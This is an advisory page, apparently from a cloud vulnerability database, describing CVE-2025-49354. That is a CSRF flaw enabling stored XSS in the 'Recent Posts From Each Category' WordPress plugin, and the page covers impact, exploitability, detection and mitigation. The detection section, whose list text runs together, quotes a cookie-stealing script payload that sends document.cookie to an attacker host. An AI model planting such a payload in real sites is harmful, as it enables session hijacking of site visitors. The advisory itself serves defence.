
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-49354 is a Cross-Site Request Forgery (CSRF) vulnerability in the "Recent Posts From Each Category" WordPress plugin by Mindstien Technologies that enables Stored Cross-Site Scripting (XSS) attacks. It affects all plugin versions up to and including 1.4. The vulnerability was reported by researcher Skalucy on October 19, 2025, and publicly disclosed by Patchstack on December 31, 2025. It carries a CVSS v3.1 base score of 7.1 (High) (Patchstack, Red Hat).
The vulnerability is classified as CWE-352 (Cross-Site Request Forgery) and arises from the plugin's failure to implement adequate CSRF token validation on sensitive administrative actions, allowing those actions to be triggered by forged cross-origin requests. By chaining the CSRF flaw with insufficient output sanitization, an attacker can cause malicious JavaScript to be persistently stored in the WordPress database (Stored XSS). Exploitation requires no authentication from the attacker but does require a privileged WordPress user (e.g., an administrator) to interact with a crafted page or link. The attack vector is network-based with low complexity and a changed scope, reflecting the cross-site nature of the XSS payload delivery (Patchstack).
Successful exploitation allows an attacker to persistently inject malicious scripts into the WordPress site, which execute in the browsers of any user visiting affected pages. This results in low-to-moderate impacts on confidentiality (e.g., session token theft), integrity (e.g., unauthorized content modification or admin action execution), and availability (e.g., defacement or redirect injection). Because the stored XSS payload persists server-side, all site visitors — not just the initially targeted administrator — are at risk of script execution, broadening the potential impact beyond the initial CSRF trigger (Patchstack, Red Hat).
No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported as of the disclosure date. The EPSS score is approximately 0.014% (0.000140), indicating a very low probability of exploitation in the near term. Patchstack classifies the priority as "Low" and notes the issue is unlikely to be actively exploited, though it acknowledges that CSRF/XSS vulnerabilities of this class are sometimes used in mass-exploit campaigns targeting WordPress plugins at scale. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Patchstack).
/wp-content/plugins/recent-posts-from-each-category/).<script>document.location='https://attacker.com/?c='+document.cookie</script>) in a plugin configuration field.wp-admin/admin-post.php or wp-admin/options.php) from unusual referrer origins or with no valid nonce parameters.<script> tags or JavaScript URIs in WordPress options or post meta fields associated with the "Recent Posts From Each Category" plugin settings.As of the disclosure date (December 31, 2025), no official patched version was listed by Patchstack, and the plugin developer had not claimed ownership of the vulnerability report. Site administrators should immediately deactivate and remove the "Recent Posts From Each Category" plugin (versions ≤ 1.4) until a patched release is available. As a compensating control, web application firewalls (WAFs) with WordPress-specific rulesets (e.g., Patchstack, Wordfence) can help block CSRF-based exploit attempts. Monitor the WordPress plugin repository and Patchstack's database for an updated version (Patchstack).
Patchstack, which discovered and disclosed the vulnerability through researcher Skalucy, classified it as low priority with unlikely exploitation impact. No significant vendor statements, notable researcher commentary, or major media coverage beyond the Patchstack advisory and automated vulnerability feed aggregators have been identified for this CVE.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."